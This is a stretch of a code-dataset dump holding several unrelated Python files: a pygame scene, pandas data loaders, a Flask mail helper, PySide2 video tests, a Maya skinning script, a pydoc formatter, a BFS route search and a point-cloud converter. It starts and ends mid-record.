0], self.sprites, self.player_group)\n \n self.boss_defeated = False\n \n self.axe = Axe(self, [-1000, -1000],self.sprites, self.tools, self.items)\n d = DreadBullet(self, [200, 200], self.sprites)\n \n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n \n if self.boss_defeated:\n return\n \n self.screen.fill([255, 0, 0])\n self.sprites.draw(self.screen)\n self.sprites.update()\n pygame.display.flip()\n self.clock.tick(60) \n\n","sub_path":"Scenes.py","file_name":"Scenes.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364467262","text":"import numpy as np\nimport pandas as pd\n\nfrom datetime import datetime\nfrom datetime import timezone\nfrom zipfile import ZipFile\nimport os\n\n\ndef make_df(start_time, end_time, path = 'data'):\n timestamps = sorted(os.listdir(os.path.join(path, 'timestamps')))\n start_timestamp, end_timestamp = make_timestamps_from_datetime(start_time, end_time, timestamps)\n interval = make_interval(start_timestamp, end_timestamp, timestamps)\n try:\n with ZipFile(os.path.join(path, 'timestamps.zip')) as timestamps_zip:\n df_list = [pd.read_csv(timestamps_zip.open(\"timestamps/\" + file), header=None,\n names=['fullVisitorId', 'url_id', 'visitStartTime']) for file in interval]\n except:\n df_list = [pd.read_csv(os.path.join(path, 'timestamps/') + file, header=None, names=['fullVisitorId', 'url_id', 'visitStartTime'])\n for file in interval]\n\n df = pd.concat(df_list)\n labels, levels = pd.factorize(df['fullVisitorId'])\n df['user_id'] = labels\n df.set_index(['user_id', 'url_id'], inplace=True, drop=True)\n return df\n\n\n# first = 12/03/2017 07:00:00, last = 14/04/2017 11:11:29 1491818423 1491991225\ndef make_timestamps_from_datetime(start_time, end_time, timestamps):\n if start_time == 'first':\n start_timestamp = timestamps[0]\n else:\n start_datetime = datetime.strptime(start_time, '%d/%m/%Y %H:%M:%S')\n start_timestamp = (start_datetime - datetime(1970, 1, 1)).total_seconds()\n\n if end_time == 'last':\n end_timestamp = timestamps[-1]\n else:\n end_datetime = datetime.strptime(end_time, '%d/%m/%Y %H:%M:%S')\n end_timestamp = (end_datetime - datetime(1970, 1, 1)).total_seconds()\n return (start_timestamp, end_timestamp)\n\n\ndef make_interval(start_timestamp, end_timestamp, timestamps):\n start_timestamp = str(start_timestamp)\n end_timestamp = str(end_timestamp)\n interval = [t for t in timestamps if t >= start_timestamp and t <= end_timestamp]\n return interval\n\n\n# Using texts.csv to make urls for each url_id\ndef make_urls_df(path = 'data'):\n texts = pd.read_csv(os.path.join(path, 'texts.csv'))\n tag_cleaned = texts['tag'].str.split().str.get(0)\n texts['tag_cleaned'] = tag_cleaned\n texts['url_id'] = texts['url_id'].astype(str)\n texts['pagePath'] = '/t/' + texts['tag_cleaned'] + '/' + texts['url_id']\n texts.set_index(['url_id'], inplace=True)\n urls = texts.drop(['subtitle', 'tag', 'title', 'tag_cleaned'], axis=1)\n return urls\n\n\ndef merge_df(df, urls):\n df.reset_index(level=['url_id'], inplace=True)\n df.reset_index(level=['user_id'], inplace=True)\n urls.reset_index(level=['url_id'], inplace=True)\n urls['url_id'] = urls['url_id'].astype(int)\n df['fullVisitorId'] = df['fullVisitorId'].astype(str)\n df_result = pd.merge(df, urls, on='url_id', how='left')\n labels, levels = pd.factorize(df_result['url_id'])\n df_result['url_id'] = labels\n df_result.set_index(['user_id', 'url_id'], inplace=True)\n df_result.sort_index(inplace=True)\n return df_result\n\nif __name__ == \"__main__\":\n df = make_df('15/03/2017 10:00:00', '16/03/2017 10:00:00')\n urls = make_urls_df()\n df_result = merge_df(df, urls)","sub_path":"read_life_dataset.py","file_name":"read_life_dataset.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255496145","text":"from flask.ext.mail import Message\nfrom threading import Thread\nfrom . import mail\nfrom flask import current_app, render_template\n\ndef send_sync_mail(app, msg):\n\twith app.app_context():\n\t\tmail.send(msg)\n\n\ndef send_mail(to, subject, template, **kwargs):\n\tapp = current_app._get_current_object()\n\tmsg = Message(app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject,\\\n\t\tsender=app.config['FLASK_MAIL_SENDER'], recipients=[to])\n\tmsg.boby = render_template(template+'.txt', **kwargs)\n\tmsg.html = render_template(template+'.html', **kwargs)\n\tthr = Thread(target=send_sync_mail, args=[app, msg])\n\tthr.start()\n\treturn thr","sub_path":"app/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402313815","text":"# -*- coding: utf-8 -*-\nimport sys\n\nfrom PySide2.QtCore import QUrl\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PySide2.QtMultimediaWidgets import QGraphicsVideoItem, QVideoWidget\nfrom PySide2.QtWidgets import *\n\n\nclass MainView(QGraphicsView):\n def __init__(self, parent=None):\n super(MainView, self).__init__(parent)\n\n\nclass MyApp(QWidget):\n def __int__(self):\n super(MyApp, self).__init__()\n\n self.master_layout = QVBoxLayout()\n\n player = QMediaPlayer()\n item = QGraphicsVideoItem()\n player.setVideoOutput(item)\n player.setMedia((QUrl(\"D:/test/1.mov\")))\n graphicsView = MainView()\n graphicsView.scene().addItem(item)\n graphicsView.show()\n\n self.master_layout.addWidget(graphicsView)\n self.setLayout(self.master_layout)\n player.play()\n\n\ndef test():\n url = QUrl.fromLocalFile(\"D:/test/1.mov\")\n content = QMediaContent(url)\n player = QMediaPlayer()\n player.setMedia(content)\n # player.setVolume(Sound_level)\n player.play()\n\n\ndef test2():\n url = QUrl.fromLocalFile(\"D:/test/2.mp4\")\n content = QMediaContent(url)\n player = QMediaPlayer()\n vw = QVideoWidget()\n vw.show()\n player.play()\n player.setVideoOutput(vw)\n player.setMedia(content)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # window = MyApp()\n # window.show()\n test2()\n sys.exit(app.exec_())\n","sub_path":"test/ps2/api/mm/videoItem.py","file_name":"videoItem.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"525499325","text":"import os\r\nimport pandas as pd\r\nfrom scipy.io import loadmat\r\nfrom sklearn.model_selection import train_test_split\r\nfrom datasets.SequenceDatasets import dataset\r\nfrom datasets.sequence_aug import *\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\nsignal_size = 1024\r\n\r\n\r\nADBdata_source=[['KA05'],['KA03'],['KI03']]\r\nADBdata_target=[['KA01','KA07'],['KA08'],['KI01']]\r\nlabel=[i for i in range(3)]\r\n\r\n#3 Bearings with real damages caused by accelerated lifetime tests(14x)\r\n\r\n#working condition\r\nWC = [\"N15_M07_F10\",\"N09_M07_F10\",\"N15_M01_F10\",\"N15_M07_F04\"]\r\n#state = WC[0] #WC[0] can be changed to different working states\r\n\r\n#generate Training Dataset and Testing Dataset\r\ndef get_files(root, N):\r\n work_condition=0\r\n '''\r\n This function is used to generate the final training set and test set.\r\n root:The location of the data set\r\n '''\r\n data = []\r\n lab = []\r\n if N[0]==0:\r\n state = WC[work_condition] # WC[0] can be changed to different working states\r\n for j in range(len(ADBdata_source)):\r\n state1=ADBdata_source[j]\r\n for k in range(len(state1)):\r\n for w3 in range(1):\r\n name3 = state + \"_\"+state1[k]+\"_\"+ str(w3 + 1)\r\n path3 = os.path.join('/tmp', root,state1[k] , name3 + \".mat\")\r\n data3, lab3= data_load(path3,name=name3,label=label[j])\r\n data += data3\r\n lab += lab3\r\n elif N[0]==1:\r\n state = WC[work_condition] # WC[0] can be changed to different working states\r\n for j in range(len(ADBdata_target)):\r\n state1 = ADBdata_target[j]\r\n for k in range(len(state1)):\r\n for w3 in range(1):\r\n name3 = state + \"_\"+state1[k]+\"_\"+ str(w3 + 1)\r\n path3 = os.path.join('/tmp', root,state1[k] , name3 + \".mat\")\r\n data3, lab3 = data_load(path3, name=name3, label=label[j])\r\n #if w3 == 0 and state1[k] == 'KI01':\r\n #print(data3)\r\n data += data3\r\n lab += lab3\r\n\r\n return [data,lab]\r\n\r\ndef data_load(filename,name,label):\r\n '''\r\n This function is mainly used to generate test data and training data.\r\n filename:Data location\r\n '''\r\n fl = loadmat(filename)[name]\r\n fl = fl[0][0][2][0][6][2] #Take out the data\r\n fl = fl.reshape(-1,)\r\n data=[]\r\n lab=[]\r\n start,end=0,signal_size\r\n while end<=fl.shape[0]:\r\n x = fl[start:end]\r\n x = np.fft.fft(x)\r\n x = np.abs(x) / len(x)\r\n x = x[range(int(x.shape[0] / 2))]\r\n x = x.reshape(-1,1)\r\n data.append(x)\r\n lab.append(label)\r\n start +=signal_size\r\n end +=signal_size\r\n\r\n return data, lab\r\n\r\n#--------------------------------------------------------------------------------------------------------------------\r\nclass PUFFT_type(object):\r\n num_classes = 3\r\n inputchannel = 1\r\n\r\n def __init__(self, data_dir, transfer_task, normlizetype=\"0-1\"):\r\n self.data_dir = data_dir\r\n self.source_N = transfer_task[0]\r\n self.target_N = transfer_task[1]\r\n self.normlizetype = normlizetype\r\n self.data_transforms = {\r\n 'train': Compose([\r\n Reshape(),\r\n Normalize(self.normlizetype),\r\n # RandomAddGaussian(),\r\n # RandomScale(),\r\n # RandomStretch(),\r\n # RandomCrop(),\r\n Retype(),\r\n # Scale(1)\r\n ]),\r\n 'val': Compose([\r\n Reshape(),\r\n Normalize(self.normlizetype),\r\n Retype(),\r\n # Scale(1)\r\n ])\r\n }\r\n\r\n def data_split(self, transfer_learning=True):\r\n if transfer_learning:\r\n # get source train and val\r\n list_data = get_files(self.data_dir, self.source_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n source_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n source_val = dataset(list_data=val_pd, transform=self.data_transforms['val'])\r\n\r\n # get target train and val\r\n list_data = get_files(self.data_dir, self.target_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n target_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n target_val = dataset(list_data=val_pd, transform=self.data_transforms['val'])\r\n return source_train, source_val, target_train, target_val\r\n else:\r\n #get source train and val\r\n list_data = get_files(self.data_dir, self.source_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n source_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n source_val = dataset(list_data=val_pd, transform=self.data_transforms['val'])\r\n\r\n # get target train and val\r\n list_data = get_files(self.data_dir, self.target_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n target_val = dataset(list_data=data_pd, transform=self.data_transforms['val'])\r\n return source_train, source_val, target_val\r\n\r\n","sub_path":"datasets/PUFFT_type.py","file_name":"PUFFT_type.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534932469","text":"\"\"\"\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nNote: You may not engage in multiple transactions at the same time (i.e., you must sell the stock before you buy again).\n\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n\n\tdef maxProfit(self, prices: List[int]) -> int:\n\t\tprofit = 0\n\t\tfor i in range(0, len(prices) - 1):\n\t\t\tif prices[i + 1] > prices[i]:\n\t\t\t\tprofit += prices[i + 1] - prices[i]\n\t\t\t\t#Traverse the list. When the next element is greater than one element, calculate the difference and add it to the profit.\n\t\treturn profit","sub_path":"Best Time to Buy and Sell Stock II.py","file_name":"Best Time to Buy and Sell Stock II.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504331866","text":"__author__ = 'Alex'\n\n# Nothing working.\nimport pymel.core as pmc\n\nfrom AWGeneral import *\nfrom awSettings import *\n\ndef reskinSubDiv(mesh, subDMeshes, history, smooth):\n curSel = getCurrentSelectionList()\n meshHistory = pmc.listHistory(mesh)\n if len(mesh) == 1:\n # set this up.\n reskinSubD(mesh, subDMeshes, history, smooth)\n\ndef reskinSubD(mesh, subDMesh, history, smooth):\n curSel = getCurrentSelectionList()\n meshHistory = pmc.listHistory()\n skinCluster = pmc.ls(meshHistory, type='skinCluster')\n if skinCluster[0]:\n attachedJoints = pmc.listConnections(skinCluster[0], type='joint')\n pmc.select(subDMesh)\n if history:\n pmc.deleteHistory()\n unlockAttrs(subDMesh, ['translate', 'rotate', 'scale'])\n pmc.makeIdentity(apply=True, t=True, r=True, s=True, n=False)\n\n if len(attachedJoints) > 0:\n pmc.select(attachedJoints, add=True)\n # new Skin Cluster\n # Open Maya\n pmc.select(mesh, replace=True)\n pmc.select(subDMesh, add=True)\n if smooth:\n pmc.copySkinWeights(ss=skinCluster[0], ds=newSkinCluster[0], noMirror=True, smooth=True)\n else:\n pmc.copySkinWeights(ss=skinCluster[0], ds=newSkinCluster[0], noMirror=True)\n else:\n pmc.displayWarning(wNOSKINCLUSTER)\n pmc.select(curSel)\n\n\n\n\n\n\n\n\n\n","sub_path":"libs/awSkin.py","file_name":"awSkin.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"513972811","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.3 (62011)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: \\Ft\\Lib\\DistExt\\Formatters\\ApiFormatter.py\n# Compiled at: 2006-08-12 10:56:26\nimport os, re, pydoc, inspect, types, imp, stat, time, XmlFormatter\n_builtin_types = vars(types).values()\n_builtin_types = [ t for t in _builtin_types if type(t) is types.TypeType ]\n_global_module_names = (\n '__builtin__', 'exceptions')\n_re_arglist = re.compile(' *[a-zA-Z_][a-zA-Z0-9_]* *\\\\((?P[^)]*) *\\\\)')\ntry:\n _visiblename = pydoc.visiblename\nexcept AttributeError:\n _special_names = [\n 'builtins', 'doc', 'file', 'path', 'module', 'name']\n _special_names = [ '__%s__' % name for name in _special_names ]\n\n def _visiblename(name):\n \"\"\"Decide whether to show documentation on a variable.\"\"\"\n if name in _special_names:\n return 0\n if name.startswith('__') and name.endswith('__'):\n return 1\n return not name.startswith('_')\n\n\nclass ApiFormatter(XmlFormatter.XmlFormatter):\n __module__ = __name__\n document_type = types.ModuleType\n\n def __init__(self, command, modules):\n XmlFormatter.XmlFormatter.__init__(self, command)\n self.module_info = modules\n return\n\n def ispublic(self, name):\n if hasattr(self.module, '__all__'):\n return name in self.module.__all__ and 'yes' or 'no'\n else:\n return not name.startswith('_') and 'yes' or 'no'\n\n def isdocumented(self, name):\n return name in self.module_info and 'yes' or 'no'\n\n def document(self, module):\n \"\"\"\n Produce documentation for a given module object.\n \"\"\"\n module_name = module.__name__\n attributes = {'name': module_name}\n self.start_element('module', attributes)\n (absfile, module_type) = self.module_info[module_name]\n mtime = os.stat(absfile)[stat.ST_MTIME]\n mtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(mtime))\n self.write_element('modification-date', content=mtime)\n self.write_description(module)\n for attr in ['author', 'credits', 'date', 'version']:\n if hasattr(module, '__%s__' % attr):\n content = self.escape(str(getattr(module, '__%s__' % attr)))\n self.write_element(attr, content=content)\n\n submodules = []\n if module_type == imp.PKG_DIRECTORY:\n name = re.escape(module_name)\n submodule_match = re.compile('^%s\\\\.([^.]+)$' % name).match\n for fullname in self.module_info:\n match = submodule_match(fullname)\n if match:\n name = match.group(1)\n try:\n submod = pydoc.safeimport(fullname)\n except:\n submod = None\n else:\n if submod is None:\n submod = imp.new_module(fullname)\n submodules.append((name, submod))\n\n all = getattr(module, '__all__', [])\n for (name, member) in inspect.getmembers(module, inspect.ismodule):\n if name in all:\n submodules.append((name, member))\n\n if submodules:\n submodules.sort()\n self.section('modules', submodules, self.doc_submodule)\n\n def isclass(object):\n \"\"\"\n Replacement for inspect's broken isclass() which fails for\n instances of classes which define a custom __getattr__.\n \"\"\"\n return isinstance(object, (types.ClassType, type))\n\n classes = [ t for t in inspect.getmembers(module, isclass) if (inspect.getmodule(t[1]) or module) is module or t[0] in all ]\n if classes:\n self.section('classes', classes, self.doc_class)\n funcs = [ t for t in inspect.getmembers(module, inspect.isroutine) if (inspect.getmodule(t[1]) or module) is module or t[0] in all ]\n if funcs:\n self.section('functions', funcs, self.doc_function)\n globals = [ t for t in inspect.getmembers(module, pydoc.isdata) if t[0] in all or _visiblename(t[0]) ]\n if globals:\n self.section('globals', globals, self.doc_global)\n self.end_element('module')\n return\n return\n\n def doc_submodule(self, module, name):\n \"\"\"Produce XML documentation for a submodule\"\"\"\n realname = module.__name__\n name = name or realname\n attributes = {'name': name, 'realname': realname, 'public': name.startswith('_') and 'no' or 'yes', 'documented': self.isdocumented(realname)}\n self.start_element('module-reference', attributes)\n self.write_description(module)\n self.end_element('module-reference')\n return\n\n def doc_class(self, klass, name):\n \"\"\"Produce XML documentation for a given class object.\"\"\"\n realname = klass.__name__\n name = name or realname\n attributes = {'name': name, 'public': self.ispublic(name)}\n if name != realname:\n attributes['realname'] = realname\n self.start_element('class', attributes)\n if klass.__bases__:\n self.start_element('bases')\n for base in klass.__bases__:\n attributes = {'class': base.__name__, 'documented': self.isdocumented(base.__module__)}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('base', attributes)\n\n self.end_element('bases')\n self.write_description(klass)\n self.start_element('method-resolution-order')\n mro = list(inspect.getmro(klass))\n bases = {}\n for base in mro:\n attributes = {'name': base.__name__}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('base', attributes)\n\n self.end_element('method-resolution-order')\n attrs = inspect.classify_class_attrs(klass)\n attrs = [ t for t in attrs if _visiblename(t[0]) ]\n while attrs:\n if mro:\n thisclass = mro.pop(0)\n else:\n thisclass = attrs[0][2]\n inherited_attrs = [ t for t in attrs if t[2] is not thisclass ]\n attrs = [ t for t in attrs if t[2] is thisclass ]\n attrs.sort()\n methods = []\n members = []\n for (name, kind, homecls, obj) in attrs:\n if kind == 'method':\n obj = getattr(klass, name)\n elif inspect.isbuiltin(obj):\n kind = 'method'\n info = (obj, name, homecls, kind)\n if kind.endswith('method'):\n methods.append(info)\n else:\n members.append(info)\n\n inherited = thisclass is not klass\n if inherited:\n attributes = {'class': thisclass.__name__, 'documented': self.isdocumented(thisclass.__module__)}\n if thisclass.__module__ not in _global_module_names:\n attributes['module'] = thisclass.__module__\n if methods:\n self.start_element('inherited-methods', attributes)\n for info in methods:\n self.doc_inherited(*info)\n\n self.end_element('inherited-methods')\n if members:\n self.start_element('inherited-members', attributes)\n for info in members:\n self.doc_inherited(*info)\n\n self.end_element('inherited-members')\n else:\n if methods:\n self.start_element('methods', attributes)\n for info in methods:\n if inspect.ismethoddescriptor(info[0]):\n self.doc_methoddescriptor(*info)\n else:\n self.doc_method(*info)\n\n self.end_element('methods')\n if members:\n self.start_element('members', attributes)\n for info in members:\n self.doc_member(*info)\n\n self.end_element('members')\n attrs = inherited_attrs\n\n self.end_element('class')\n return\n\n def format_arg(self, arg, default=None):\n attributes = {}\n if default is not None:\n attributes['default'] = default\n if type(arg) in [types.TupleType, types.ListType]:\n self.start_element('sequence', attributes)\n for a in arg:\n self.format_arg(a)\n\n self.end_element('sequence')\n else:\n attributes['name'] = arg\n self.write_element('arg', attributes)\n return\n return\n\n def doc_arguments(self, object):\n self.start_element('arguments')\n if inspect.isfunction(object):\n (args, varargs, varkw, defaults) = inspect.getargspec(object)\n if defaults:\n firstdefault = len(args) - len(defaults)\n for i in xrange(len(args)):\n if defaults and i >= firstdefault:\n default = repr(defaults[(i - firstdefault)])\n else:\n default = None\n self.format_arg(args[i], default)\n\n if varargs:\n self.write_element('var-args', {'name': varargs})\n if varkw:\n self.write_element('var-keywords', {'name': varkw})\n else:\n arglist = '...'\n if inspect.isbuiltin(object):\n match = _re_arglist.match(pydoc.getdoc(object))\n if match:\n arglist = match.group('arglist')\n self.write_element('unknown', content=arglist)\n self.end_element('arguments')\n return\n return\n\n def doc_method(self, method, name, klass, kind):\n \"\"\"\n Document a method, class method or static method as given by 'kind'\n \"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n realname = method.__name__\n if name != realname:\n attributes['realname'] = realname\n if getattr(klass, realname, None) == method:\n attributes['realid'] = klass.__name__ + '-' + realname\n tagname = kind.replace(' ', '-')\n self.start_element(tagname, attributes)\n self.write_description(method)\n func = getattr(method, 'im_func', method)\n self.doc_arguments(func)\n for base in inspect.getmro(klass)[1:]:\n overridden = getattr(base, name, None)\n if overridden:\n attributes = {'class': base.__name__, 'documented': self.isdocumented(base.__module__)}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('overrides', attributes)\n break\n\n self.end_element(tagname)\n return\n return\n\n def doc_methoddescriptor(self, descr, name, klass, kind):\n \"\"\"\n Document a class method or static method as given by 'kind'\n \"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n tagname = kind.replace(' ', '-')\n self.start_element(tagname, attributes)\n self.write_description(descr)\n self.doc_arguments(descr)\n self.end_element(tagname)\n return\n\n def doc_member(self, object, name, klass, kind):\n \"\"\"Produce XML documentation for a data object.\"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n self.start_element('member', attributes)\n if (callable(object) or kind == 'property') and hasattr(object, '__doc__') and getattr(object, '__doc__'):\n self.write_description(object)\n self.write_element('value', content=self.repr(object))\n self.end_element('member')\n return\n\n def doc_inherited(self, object, name, klass, kind):\n \"\"\"Produce XML documentation for an inherited object.\"\"\"\n attributes = {'name': name, 'public': self.ispublic(name)}\n self.write_element('member-reference', attributes)\n return\n\n def doc_function(self, func, name):\n \"\"\"\n Document a function\n \"\"\"\n realname = func.__name__\n if realname == '':\n realname = 'lambda'\n name = name or realname\n attributes = {'name': name, 'id': name, 'public': self.ispublic(name)}\n if name != realname:\n attributes['realname'] = realname\n self.start_element('function', attributes)\n self.write_description(func)\n self.doc_arguments(func)\n self.end_element('function')\n return\n\n def doc_global(self, object, name):\n \"\"\"Produce XML documentation for a data object.\"\"\"\n attributes = {'name': name, 'id': name, 'public': self.ispublic(name)}\n self.start_element('global', attributes)\n if isinstance(object, types.InstanceType) and object.__doc__ != object.__class__.__doc__ or type(object) not in _builtin_types and hasattr(object, '__doc__') and getattr(object, '__doc__'):\n self.write_description(object)\n self.write_element('value', content=self.repr(object))\n self.end_element('global')\n return\n\n def write_description(self, object):\n \"\"\"Produce XML tag(s) for an object description.\"\"\"\n docstring = self.escape(pydoc.getdoc(object))\n paragraphs = docstring.split('\\n\\n')\n if paragraphs:\n abstract = paragraphs[0]\n description = ('\\n\\n').join(paragraphs[1:])\n else:\n abstract = None\n description = None\n self.write_element('abstract', content=abstract)\n self.write_element('description', content=description)\n return\n return\n\n\nif not hasattr(inspect, 'getmro'):\n\n def _searchbases(cls, accum):\n if cls in accum:\n return\n accum.append(cls)\n for base in cls.__bases__:\n _searchbases(base, accum)\n\n\n def getmro(cls):\n \"\"\"Return list of base classes (including cls) in method resolution order.\"\"\"\n result = []\n _searchbases(cls, result)\n return result\n\n\n inspect.getmro = getmro\nif not hasattr(inspect, 'classify_class_attrs'):\n\n def classify_class_attrs(cls):\n \"\"\"Return list of attribute-descriptor tuples.\n\n For each name defined on class, cls, the return list contains a\n 4-tuple with these elements:\n\n 0. The name (a string).\n\n 1. The kind of attribute this is, one of these strings:\n 'method' any flavor of method\n 'data' not a method\n\n 2. The class which defined this attribute (a class).\n\n 3. The object as obtained directly from the defining class's\n __dict__, not via getattr.\n \"\"\"\n bases = getmro(cls)\n bases.reverse()\n combined = {}\n for baseclass in bases:\n for (name, value) in baseclass.__dict__.items():\n combined[name] = (\n baseclass, value)\n\n names = combined.keys()\n names.sort()\n result = []\n for name in names:\n (true_class, obj) = combined[name]\n if inspect.ismethod(getattr(cls, name)):\n kind = 'method'\n else:\n kind = 'data'\n result.append((name, kind, true_class, obj))\n\n return result\n\n\n inspect.classify_class_attrs = classify_class_attrs","sub_path":"pycfiles/51degrees-mobile-detector-lite-pattern-wrapper-1.0.tar/ApiFormatter.py","file_name":"ApiFormatter.py","file_ext":"py","file_size_in_byte":15949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"296334438","text":"\nimport numpy as np\nimport queue\n\nroadmap = np.loadtxt(\"map.txt\", dtype=str, delimiter=' ')\n\nstart = 'Arad'\nend = 'Bucharest'\n\n\ndef solution(neighbors, start, end):\n for x in neighbors:\n if(start == x[0] and end == x[len(x)-1]):\n return x\n\n\ndef expand(road, current, fringe, closed, paths):\n neighbors = []\n for x in road:\n if x[0] == current:\n if x[1] not in list(closed.queue):\n fringe.put(x[1])\n neighbors.append(x[1])\n for y in paths:\n if y[len(y)-1] == current:\n for neighbor in neighbors:\n z = y+[neighbor]\n paths.append(z)\n paths.remove(y)\n\n return paths\n\n\ndef BFS(start, end):\n fringe = queue.Queue()\n closed = queue.Queue()\n fringe.put(start)\n\n paths = [[start]]\n while(fringe.empty() == False):\n current = fringe.get()\n if current not in list(closed.queue):\n closed.put(current)\n if current == end:\n return solution(paths, start, end)\n else:\n expand(roadmap, current, fringe, closed, paths)\n\n print(\"-----fringe-------\", list(fringe.queue))\n\n return \"no solution\"\n\n\nprint(\"/-----------------------------BFS solution ---------------------------/\", BFS(start, end))\n","sub_path":"06cntt1_0650080033__PhamMinhThien_BFS/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213414158","text":"from django.test import SimpleTestCase\n\nfrom ..apps import TmcConfig\n\n\nclass AppConfigTestCase(SimpleTestCase):\n\n def test_ready(self) -> None:\n from django.apps.registry import apps\n\n tmc_app_config = apps.app_configs['tmc']\n app_config = TmcConfig(\n app_name=tmc_app_config.name,\n app_module=tmc_app_config.module,\n )\n\n # Nothing should be raised.\n app_config.ready()\n","sub_path":"tmc/tests/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440522563","text":"import sys\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom pcd_io import read_pcd\nfrom ply_io import write_ply\n\ndef apply_rotation(M, df):\n\n if 'a' not in df.columns:\n df.loc[:, 'a'] = 1\n r_ = np.dot(M, df[['x', 'y', 'z', 'a']].T).T\n df.loc[:, ['x', 'y', 'z']] = r_[:, :3]\n return df\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--pcd', nargs='*', help='pcd files')\n parser.add_argument('-r', '--rotation', action='store_true', help='pcd files')\n parser.add_argument('--combine', nargs=1, default=False, help='name of .ply with all point clouds merged')\n parser.add_argument('--colour', nargs=1, default=False, help='add colour to point cloud')\n args = parser.parse_args()\n\n pc = pd.DataFrame()\n\n for pcd in args.pcd:\n\n df = read_pcd(pcd).astype(float)\n df = df.round({v:3 for v in ['x', 'y', 'z', 'intensity'] if v in df.columns})\n\n if 'red' in df.columns:\n pass\n elif 'rgb' in df.columns:\n cmap = pd.DataFrame.from_dict({c:np.random.randint(0, high=255, size=3) for c in df.rgb.unique()},\n orient='index')\n cmap.reset_index(inplace=True)\n cmap.columns = ['rgb', 'red', 'green', 'blue']\n df = pd.merge(df, cmap, on='rgb')\n elif args.colour:\n df['red'] = np.random.randint(0, 255)\n df['green'] = np.random.randint(0, 255)\n df['blue'] = np.random.randint(0, 255)\n else:\n pass\n\n if args.rotation:\n M = np.loadtxt(args.rotation)\n pc = apply_rotation(M, pc)\n\n if not args.combine:\n write_ply(pcd.replace('.pcd', '.ply'), df)\n else:\n pc = pc.append(df)\n\n if args.combine:\n write_ply(args.combine[0], pc)\n\n","sub_path":"python/pcd2ply.py","file_name":"pcd2ply.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"141282942","text":"import csv\nfrom sequential_grid_analyzer import Grid\nfrom datetime import datetime\nfrom os import listdir\nimport infoblu as ib\nfrom sequential_graph import GridGraph\nimport weight_computator as wc\nimport pickle \n\npathInfoBlue = \"/Users/Kate/Desktop/PROGETTOBDC/roma_infoblu/output_20150301_ROMA.txt\"\npath = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/id_unici.csv\"\npathpresence = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Presence.csv\"\npathunipol = \"/Users/Kate/Desktop/PROGETTOBDC/elaboratedFiles/Unipol.csv\"\npathviasat = 